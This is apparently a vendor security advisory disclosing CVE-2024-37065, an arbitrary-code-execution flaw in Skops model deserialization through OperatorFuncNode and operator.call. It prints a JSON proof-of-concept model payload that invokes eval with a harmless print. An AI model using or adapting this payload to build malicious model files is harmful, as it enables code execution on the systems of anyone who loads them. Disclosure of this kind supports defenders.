HiddenLayer is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
June 4, 2024
Model Deserialization Leads to Code Execution
CVE Number
CVE-2024-37065
Summary
When loading nodes of type OperatorFuncNode Skops allows a model to call functions from within the operator module, specifying both the function and the arguments being passed to it. This system allows an attacker to craft a specialized payload in the form of a model that allows for arbitrary code execution to occur when a malicious model is loaded and compiled.
Products Impacted
This vulnerability is present in Skops v0.6 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability breaks down into 2 main components, the ability to load arbitrary functions into memory, and the ability to call a function in the operator module. The first can be done by creating a node of type TypeNode and pulling in any function you want, such as the builtin eval function:
{
"__class__": "eval",
"__module__": "builtins",
"__loader__": "TypeNode",
"__id__": 1
}
Because we can load functions into memory, if we are able to call them with the arguments that we want we can then exploit the loading system. This occurs in the compilation of a OperatorFuncNode node:
In Python 3.11 and later there is a function in the operator module called call which allows a user to call a function passed to it. This means that we need to create a model that grabs the call function and then passes in the eval function and the code we want to run:
{
"__class__": "call",
"__module__": "",
"__loader__": "OperatorFuncNode",
"attrs": {
"__class__": "tuple",
"__module__": "builtins",
"__loader__": "TupleNode",
"content": [
{
"__class__": "eval",
"__module__": "builtins",
"__loader__": "TypeNode",
"__id__": 1
},
{
"__class__": "str",
"__module__": "builtins",
"__loader__": "JsonNode",
"content": "\"print('pwned by Abraxus from HiddenLayer')\"",
"__id__": 5,
"is_json": true
}
],
"__id__": 8
},
"__id__": 0,
"protocol": 1,
"_skops_version": "0.10.dev0"
}
When loaded with the trusted parameter set to True or setting the trusted types to all unknown types, this then executes the code and returns None. In the tutorial for how to use the library (scikit-learn documentation) both examples would allow for code execution:
However, for the security minded individuals out there, since in multiple parts of the codebase load and loads are called with trusted set to True inside of another function, users can still be exploited. One example of this is the update command line tool: